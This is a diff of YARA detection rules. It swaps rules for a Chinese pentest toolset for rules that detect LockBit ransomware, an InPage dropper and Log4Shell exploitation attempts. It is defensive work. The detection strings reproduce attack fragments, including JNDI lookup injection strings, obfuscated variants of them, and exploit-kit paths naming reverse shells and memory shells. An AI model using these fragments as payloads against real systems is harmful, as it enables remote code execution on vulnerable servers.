-		id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
-		date = "2015-06-23"
+		description = "Detects LockBit ransomware samples for Linux and macOS"
+		author = "Florian Roth"
+		id = "c01cb907-7d30-5487-b908-51f69ddb914c"
+		date = "2023-04-15"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2250-L2268"
+		reference = "https://twitter.com/malwrhunterteam/status/1647384505550876675?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L2-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
-		logic_hash = "5bd0cbb1c2f5863ef1365dc115c736ade05c290cd6fa09a24c2d344314b522cb"
-		score = 70
+		logic_hash = "6d838e8b207b97d7c335dc4066de2c6dc87f7adc9cac31742677edbe85386cf7"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0a2bffa0a30ec609d80591eef1d0994d8b37ab1f6a6bad7260d9d435067fb48e"
+		hash2 = "9ebcbaf3c9e2bbce6b2331238ab584f95f7ced326ca4aba2ddcc8aa8ee964f66"
+		hash3 = "a405d034c01a357a89c9988ffe8a46a165915df18fd297469b2bcaaf97578442"
+		hash4 = "c9cac06c9093e9026c169adc3650b018d29c8b209e3ec511bbe34cbe1638a0d8"
+		hash5 = "dc3d08480f5e18062a0643f9c4319e5c3f55a2e7e93cd8eddd5e0c02634df7cf"
+		hash6 = "e77124c2e9b691dbe41d83672d3636411aaebc0aff9a300111a90017420ff096"
+		hash7 = "0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde"
+		hash8 = "3e4bbd21756ae30c24ff7d6942656be024139f8180b7bddd4e5c62a9dfbd8c79"
 
 	strings:
-		$s1 = ".dns166.co" ascii
-		$s2 = "SExecuteA" ascii
-		$s3 = "ality/clsCom" ascii
-		$s4 = "NT_SINK_AddRef" ascii
-		$s5 = "WINDOWS\\Syswm" ascii
+		$x1 = "restore-my-files.txt" ascii fullword
+		$s1 = "ntuser.dat.log" ascii fullword
+		$s2 = "bootsect.bak" ascii fullword
+		$s3 = "autorun.inf" ascii fullword
+		$s4 = "lockbit" ascii fullword
+		$xc1 = { 33 38 36 00 63 6D 64 00 61 6E 69 00 61 64 76 00 6D 73 69 00 6D 73 70 00 63 6F 6D 00 6E 6C 73 }
+		$xc2 = { 6E 74 6C 64 72 00 6E 74 75 73 65 72 2E 64 61 74 2E 6C 6F 67 00 62 6F 6F 74 73 65 63 74 2E 62 61 6B }
+		$xc3 = { 76 6D 2E 73 74 61 74 73 2E 76 6D 2E 76 5F 66 72 65 65 5F 63 6F 75 6E 74 00 61 2B 00 2F 2A }
+		$op1 = { 84 e5 f0 00 f0 e7 10 40 2d e9 2e 10 a0 e3 00 40 a0 e1 ?? fe ff }
+		$op2 = { 00 90 a0 e3 40 20 58 e2 3f 80 08 e2 3f 30 c2 e3 09 20 98 e1 08 20 9d }
+		$op3 = { 2d e9 01 70 43 e2 07 00 13 e1 01 60 a0 e1 08 d0 4d e2 02 40 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and ( 1 of ( $x* ) or 3 of them ) or 2 of ( $x* ) or 5 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Fpipe_Fpipe : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
-		date = "2015-06-23"
+		description = "Detects indicators found in LockBit ransomware"
+		author = "Florian Roth"
+		id = "75dc8b95-16f0-5170-a7d6-fc10bb778348"
+		date = "2023-04-17"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2270-L2286"
+		reference = "https://objective-see.org/blog/blog_0x75.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L43-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
-		logic_hash = "bde46f2508dc82f91e39cc7bd88960e836522b068546ce65ebc07db69b3d4493"
-		score = 50
+		logic_hash = "cd5bffa5571abfd1446b065d26c8c23f00fe1376d505af539c6f37356014a86f"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii
-		$s2 = "http://www.foundstone.com" fullword ascii
-		$s3 = "%s %s port %d. Address is already in use" fullword ascii
+		$xe1 = "-i '/path/to/crypt'" xor
+		$xe2 = "http://lockbit" xor
+		$s1 = "idelayinmin" ascii
+		$s2 = "bVMDKmode" ascii
+		$s3 = "bSelfRemove" ascii
+		$s4 = "iSpotMaximum" ascii
+		$fp1 = "<html"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		(1 of ( $x* ) or 4 of them ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_CN_Honker_Layer_Layer : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Locker_LOG_Apr23_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2288-L2305"
+		description = "Detects indicators found in LockBit ransomware log files"
+		author = "Florian Roth"
+		id = "aa0a2393-e5a2-5151-8afb-91a9bb922179"
+		date = "2023-04-17"
+		modified = "2023-12-05"
+		reference = "https://objective-see.org/blog/blog_0x75.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L69-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
-		logic_hash = "03e2d875de6dc45a0cede55071c071944c4cdf4610f52fe4a21f6dd5dedac41d"
-		score = 70
+		logic_hash = "d5f96e601150209382d3f6458863bc79768beb99b587aa8d9ba37cb2c11ef634"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "\\Release\\Layer.pdb" ascii
-		$s2 = "Layer.exe" fullword wide
-		$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide
+		$s1 = " is encrypted. Checksum after encryption "
+		$s2 = "~~~~~Hardware~~~~"
+		$s3 = "[+] Add directory to encrypt:"
+		$s4 = "][+] Launch parameters: "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Ms10048_X86 : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms10048-x86.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5d572d35-d2e5-5457-89d9-fbce8f8fa552"
-		date = "2015-06-23"
+		description = "Detects forensic artifacts found in LockBit intrusions"
+		author = "Florian Roth"
+		id = "e716030c-ee78-51dc-919c-cf59e93da976"
+		date = "2023-04-17"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2307-L2321"
+		reference = "https://objective-see.org/blog/blog_0x75.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L86-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
-		logic_hash = "2f67b3be31b1d1eb420b40ec291db7271acd692af9f061d5db17415685cf7546"
-		score = 70
+		logic_hash = "81021f8c9aed17c007d7329a598c644a706fa9750818c8974984eefcba8d06c2"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$x1 = "/tmp/locker.log" ascii fullword
+		$x2 = "Executable=LockBit/locker_" ascii
+		$xc1 = { 54 6F 72 20 42 72 6F 77 73 65 72 20 4C 69 6E 6B 73 3A 0D 0A 68 74 74 70 3A 2F 2F 6C 6F 63 6B 62 69 74 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
+		1 of ( $x* )
 }
-rule SIGNATURE_BASE_CN_Honker_Htran2_4 : FILE
+rule SIGNATURE_BASE_Gen_Suspicious_Inpage_Dropper : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
-		date = "2015-06-23"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Florian Roth"
+		id = "9144711a-e6ee-5c97-a5f4-3f6df1d630dc"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2323-L2338"
+		reference = "https://twitter.com/Ahmedfshosha/status/1138138981521154049"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_InPage_dropper.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "524f986692f55620013ab5a06bf942382e64d38a"
-		logic_hash = "dd1332d3dca12513b1f8a1d10148f6fa2eb7cc809ac7cf6f4dcc9090746718b5"
-		score = 70
+		logic_hash = "8ab5d0bffa72b32f4c388f42a38a799c178fddf9f06b1262842e146c43448bd4"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852"
+		hash2 = "1d1e7a6175e6c514aaeca8a43dabefa017ddc5b166ccb636789b6a767181a022"
+		hash3 = "bd293bdf3be0a44a92bdb21e5fa75c124ad1afed3c869697bf90c9732af0e994"
+		hash4 = "d8edf3e69f006f85b9ee4e23704cd5e95e895eb286f9b749021d090448493b6f"
 
 	strings:
-		$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
-		$s2 = "[+] New connection %s:%d !!" fullword ascii
+		$s1 = "InPage Arabic Document"
+		$c1 = {31 06 83 c6 04 e2 }
+		$c2 = {90 90 90 90 90 90 90 e8 fb }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		filesize < 3MB and uint32be( 0 ) == 0xD0CF11E0 and $s1 and 1 of ( $c* )
 }
-rule SIGNATURE_BASE_CN_Honker_Skinhrootkit_Skinh : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_Callbackdomain_Iocs_Dec21_1 : CVE_2021_44228
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SkinH.exe"
+		description = "Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8aedd01c-9dc8-537d-97ea-bc8de81edd3d"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2340-L2356"
+		id = "474afa96-1758-587e-8cab-41c5205e245e"
+		date = "2021-12-12"
+		modified = "2025-03-29"
+		reference = "https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d593f03ae06e54b653c7850c872c0eed459b301f"
-		logic_hash = "97314a8c908c714c39ea8962c87709fdc422c3e2998a2b1694950fa127204335"
-		score = 70
+		logic_hash = "8d5e60f91b715242c6f8ee806ab81d3e296ce1467cf2d065b053f33e3ae00f14"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2021-44228"
 
 	strings:
-		$s0 = "(C)360.cn Inc.All Rights Reserved." fullword wide
-		$s1 = "SDVersion.dll" fullword wide
-		$s2 = "skinh.dll" fullword ascii
+		$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker__Postgresql_Mysql_Injectv1_1_Creak_Oracle_Sqlserver_Inject_Creaked : FILE
+rule SIGNATURE_BASE_EXPL_JNDI_Exploit_Patterns_Dec21_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset"
+		description = "Detects JNDI Exploit Kit patterns in files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0272776c-8dbe-5345-92c8-57593686a84c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2358-L2378"
+		id = "a9127dd2-b818-5ca8-877a-3c47b1e92606"
+		date = "2021-12-12"
+		modified = "2025-03-29"
+		reference = "https://github.com/pimps/JNDI-Exploit-Kit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L16-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed809a5fb35d36b2a8758e470657bda1a04d80577d5129962cd7d0ab9a80cf8a"
-		score = 70
+		logic_hash = "9442c8c4eee76539892752361657c86e80acc7990876e787317b042a4637f669"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
-		hash1 = "a1f066789f48a76023598c5777752c15f91b76b0"
-		hash2 = "0264f4efdba09eaf1e681220ba96de8498ab3580"
-		hash3 = "af3c41756ec8768483a4cf59b2e639994426e2c2"
+		tags = ""
 
 	strings:
-		$s1 = "zhaoxypass@yahoo.com.cn" fullword ascii
-		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
-		$s3 = "ProxyParams.ProxyPort" fullword ascii
+		$x01 = "/Basic/Command/Base64/"
+		$x02 = "/Basic/ReverseShell/"
+		$x03 = "/Basic/TomcatMemshell"
+		$x04 = "/Basic/JettyMemshell"
+		$x05 = "/Basic/WeblogicMemshell"
+		$x06 = "/Basic/JBossMemshell"
+		$x07 = "/Basic/WebsphereMemshell"
+		$x08 = "/Basic/SpringMemshell"
+		$x09 = "/Deserialization/URLDNS/"
+		$x10 = "/Deserialization/CommonsCollections1/Dnslog/"
+		$x11 = "/Deserialization/CommonsCollections2/Command/Base64/"
+		$x12 = "/Deserialization/CommonsBeanutils1/ReverseShell/"
+		$x13 = "/Deserialization/Jre8u20/TomcatMemshell"
+		$x14 = "/TomcatBypass/Dnslog/"
+		$x15 = "/TomcatBypass/Command/"
+		$x16 = "/TomcatBypass/ReverseShell/"
+		$x17 = "/TomcatBypass/TomcatMemshell"
+		$x18 = "/TomcatBypass/SpringMemshell"
+		$x19 = "/GroovyBypass/Command/"
+		$x20 = "/WebsphereBypass/Upload/"
+		$fp1 = "<html"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_CN_Honker__Wwwscan_Wwwscan_Wwwscan_Gui : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_JAVA_Exception_Dec21_1 : CVE_2021_44228
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files wwwscan.exe, wwwscan.exe, wwwscan_gui.exe"
+		description = "Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02f80151-4dfb-5b14-9145-312a9bd2c609"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2380-L2398"
+		id = "82cf337e-4ea1-559b-a7b8-512a07adf06f"
+		date = "2021-12-12"
+		modified = "2025-03-29"
+		reference = "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L51-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0fd6ab38dca839605c1b7cd51a4a8d3268551f0725ccee7c7521f13d6f9e7076"
-		score = 70
+		logic_hash = "98eabec4ad2f5c4d22db9c3bebdc82c8dc6723599748360875fc7b613b1019ab"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
-		hash1 = "6bed45629c5e54986f2d27cbfc53464108911026"
-		hash2 = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
+		tags = "CVE-2021-44228"
 
 	strings:
-		$s1 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
-		$s2 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
+		$xa1 = "header with value of BadAttributeValueException: "
+		$sa1 = ".log4j.core.net.JndiManager.lookup(JndiManager"
+		$sa2 = "Error looking up JNDI resource"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		$xa1 or all of ( $sa* )
 }
-rule SIGNATURE_BASE_CN_Honker__LPK_LPK_LPK : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Soft : FILE CVE_2021_44228
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files LPK.DAT, LPK.DAT, LPK.DAT"
+		description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1beb88b-d3e8-5868-affb-e59c26e4dc2e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2400-L2421"
+		id = "87e536a5-cc11-528a-b100-4fa3b2b7bc0c"
+		date = "2021-12-10"
+		modified = "2025-03-24"
+		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L68-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0309241ed0e899519cf3edd1544a14d09fff4a8162514ae49b3a6b70eda1ed4f"
-		score = 70
+		logic_hash = "61a005060e2041afa5a9aa0b2a5e26cfc9a53cbafa78b15e4dd2c3b38127373a"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "5a1226e73daba516c889328f295e728f07fdf1c3"
-		hash1 = "2b2ab50753006f62965bba83460e3960ca7e1926"
-		hash2 = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
+		tags = "FILE, CVE-2021-44228"
 
 	strings:
-		$s1 = "C:\\WINDOWS\\system32\\cmd.exe" fullword wide
-		$s2 = "Password error!" fullword ascii
-		$s3 = "\\sathc.exe" ascii
-		$s4 = "\\sothc.exe" ascii
-		$s5 = "\\lpksethc.bat" ascii
+		$x01 = "${jndi:ldap:/"
+		$x02 = "${jndi:rmi:/"
+		$x03 = "${jndi:ldaps:/"
+		$x04 = "${jndi:dns:/"
+		$x05 = "${jndi:iiop:/"
+		$x06 = "${jndi:http:/"
+		$x07 = "${jndi:nis:/"
+		$x08 = "${jndi:nds:/"
+		$x09 = "${jndi:corba:/"
+		$fp1 = "<html"
+		$fp2 = "/nessus}"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1057KB and all of them
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_CN_Honker__Builder_Shift_Skinh : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_OBFUSC : CVE_2021_44228
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files builder.exe, shift.exe, SkinH.exe"
+		description = "Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb18aa4a-6eba-58ca-a6fc-e4160b90f4d7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2423-L2444"
+		id = "d7c4092a-6ffc-5a89-b73a-f7f0ac984cbd"
+		date = "2021-12-12"
+		modified = "2021-12-13"
+		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L94-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d15802df98d72b4ef3bac2dfb8ba3338c540ef7290d7ddf9738cf0f7b86e17ea"
-		score = 70
+		logic_hash = "00231db2ae83a89c187dbde1f2bc67fdaedcf1cbdf872afdcc374d2d0abee515"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "6b5a84cdc3d27c435d49de3f68872d015a5aadfc"
-		hash1 = "ee127c1ea1e3b5bf3d2f8754fabf9d1101ed0ee0"
-		hash2 = "d593f03ae06e54b653c7850c872c0eed459b301f"
+		tags = "CVE-2021-44228"
 
 	strings:
-		$s1 = "lipboard" fullword ascii
-		$s2 = "uxthem" fullword ascii
-		$s3 = "ENIGMA" fullword ascii
-		$s4 = "UtilW0ndow" fullword ascii
-		$s5 = "prog3am" fullword ascii
+		$x1 = "$%7Bjndi:"
+		$x2 = "%2524%257Bjndi"
+		$x3 = "%2F%252524%25257Bjndi%3A"
+		$x4 = "${jndi:${lower:"
+		$x5 = "${::-j}${"
+		$x6 = "${${env:BARFOO:-j}"
+		$x7 = "${::-l}${::-d}${::-a}${::-p}"
+		$x8 = "${base64:JHtqbmRp"
+		$fp1 = "<html"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6075KB and all of them
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_CN_Honker__Lcx_Htran2_4_Htran20 : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Hard : FILE CVE_2021_44228
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files lcx.exe, HTran2.4.exe, htran20.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6851e7b-ab64-5578-896e-4d92fb3b2000"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2446-L2465"
+		description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
+		author = "Florian Roth"
+		id = "5297c42d-7138-507d-a3eb-153afe522816"
+		date = "2021-12-10"
+		modified = "2025-03-20"
+		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L118-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30184394ad3ec7bf209bb0a22da889699bac6167ecc09e693c88f8643c754394"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
-		hash1 = "524f986692f55620013ab5a06bf942382e64d38a"
-		hash2 = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
+		logic_hash = "9a4fc285dd1680ebc8a1042eeb5fbba73b9e2df70678adf3163122d84405325e"
+		score = 65
+		quality = 60
+		tags = "FILE, CVE-2021-44228"
 
 	strings:
-		$s1 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s2 = "[+] OK! I Closed The Two Socket." fullword ascii
-		$s3 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
+		$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
+		$x2 = "Reference Class Name: foo"
+		$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fp1 = "/QUALYSTEST" ascii
+		$fp2 = "w.nessus.org/nessus"
+		$fp3 = "/nessus}"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 440KB and all of them
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_CN_Honker__D_Injection_V2_32_D_Injection_V2_32_D_Injection_V2_32 : FILE
+rule SIGNATURE_BASE_SUSP_Base64_Encoded_Exploit_Indicators_Dec21 : CVE_2021_44228
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - from files D_injection_V2.32.exe, D_injection_V2.32.exe, D_injection_V2.32.exe"
+		description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79e9cd97-c070-5109-a0a0-bc88eea0dc37"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2467-L2488"
+		id = "09abc4f0-ace7-5f53-b1d3-5f5c6bf3bdba"
+		date = "2021-12-10"
+		modified = "2021-12-13"
+		reference = "https://twitter.com/Reelix/status/1469327487243071493"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L142-L165"
